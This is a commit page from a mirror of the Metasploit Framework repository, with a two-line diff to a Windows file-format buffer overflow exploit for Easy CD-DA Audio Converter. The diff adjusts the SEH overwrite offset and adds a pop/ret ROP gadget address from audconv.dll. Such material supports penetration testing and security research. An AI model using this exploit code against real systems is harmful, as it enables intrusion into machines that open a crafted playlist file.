infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use pop#ret to jump over the overwritten seh

bug/bundler_fix
jvazquez-r7 2014-02-12 08:10:14 -06:00
parent 11513d94f5
commit 9845970e12
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
modules/exploits/windows/fileformat/easycdda_pls_bof.rb
View File

@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1112,
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
@ -105,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets